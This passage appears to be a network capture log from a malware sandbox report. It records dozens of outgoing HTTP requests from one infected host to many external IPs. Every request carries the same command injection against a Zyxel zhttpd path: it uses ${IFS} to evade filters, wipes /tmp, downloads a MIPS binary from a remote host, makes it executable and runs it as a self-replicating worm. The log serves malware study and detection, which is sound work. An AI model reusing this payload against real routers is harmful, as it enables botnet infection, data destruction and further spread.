                              Mar 31, 2024 08:41:30.918327093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5223192.168.2.134314682.63.84.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918397903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5224192.168.2.1343108133.172.191.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918458939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5225192.168.2.135676487.14.216.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918504953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5226192.168.2.133282073.30.12.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918555021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5227192.168.2.1350004158.2.89.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918625116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5228192.168.2.1343988121.112.252.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918709040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5229192.168.2.1334962135.28.144.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918765068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5230192.168.2.135011632.187.106.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918806076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5231192.168.2.1354124138.5.105.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918879986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5232192.168.2.1343534113.205.177.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918948889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5233192.168.2.1351374222.54.47.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919006109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5234192.168.2.135632838.182.90.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919061899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5235192.168.2.136025671.155.232.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919114113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5236192.168.2.1351176194.108.169.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919178963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5237192.168.2.1339080182.192.16.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919243097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5238192.168.2.1338476189.116.144.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919301033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5239192.168.2.1357230208.18.19.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919358969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5240192.168.2.1344056108.224.214.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919421911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5241192.168.2.1359494116.60.56.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919477940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5242192.168.2.135102824.86.103.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919542074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5243192.168.2.1351192216.153.170.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919596910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5244192.168.2.1345090113.230.112.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919660091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5245192.168.2.1333960126.59.237.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919720888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5246192.168.2.1335264173.20.174.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919791937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5247192.168.2.1337796108.167.205.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919862986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5248192.168.2.1354378136.41.9.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919920921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5249192.168.2.1335284155.213.244.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.919984102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5250192.168.2.1335038182.185.165.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920052052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5251192.168.2.1343054140.229.84.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920114994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5252192.168.2.1355394194.189.96.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920166016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5253192.168.2.136070631.154.200.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920237064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5254192.168.2.133455834.26.164.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920294046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5255192.168.2.1355536207.157.69.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920377016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5256192.168.2.1340112103.158.137.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920434952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5257192.168.2.133932437.241.0.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920496941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5258192.168.2.1347344174.148.247.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920545101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5259192.168.2.1356082104.164.228.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920617104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5260192.168.2.133363675.156.200.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920694113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5261192.168.2.1343540160.236.98.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920743942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5262192.168.2.1339144193.121.133.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920798063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5263192.168.2.1341640126.81.30.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920871019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5264192.168.2.133817639.224.167.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.920932055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5265192.168.2.13458541.249.5.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921014071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5266192.168.2.135688212.177.20.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921067953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5267192.168.2.1355430191.35.29.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921132088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5268192.168.2.1333626152.77.227.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921180964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5269192.168.2.134622865.243.234.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921263933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5270192.168.2.133543476.21.80.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921322107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5271192.168.2.1354828182.204.211.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921397924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5272192.168.2.134762817.80.252.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921463013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5273192.168.2.13507161.143.62.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921520948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5274192.168.2.1346284148.89.165.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921600103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5275192.168.2.134899297.72.15.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921637058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5276192.168.2.1360208142.142.89.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921710014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5277192.168.2.1355172114.61.79.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921756983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5278192.168.2.134669650.141.127.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921818972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5279192.168.2.1353918159.39.200.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921871901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5280192.168.2.134605670.71.161.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921937943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5281192.168.2.1341428137.167.178.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.921988010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5282192.168.2.1336222124.254.147.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922071934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5283192.168.2.135677252.168.40.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922118902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5284192.168.2.1353146108.47.213.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922199965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5285192.168.2.135581059.76.228.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922275066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5286192.168.2.1349424222.254.242.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922331095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5287192.168.2.13493589.120.169.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922410011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5288192.168.2.135428476.114.83.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922465086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5289192.168.2.1340620118.50.6.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922513008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5290192.168.2.1342240135.39.202.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922578096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5291192.168.2.1340100146.20.244.28443
                              TimestampBytes transferredDirectionData
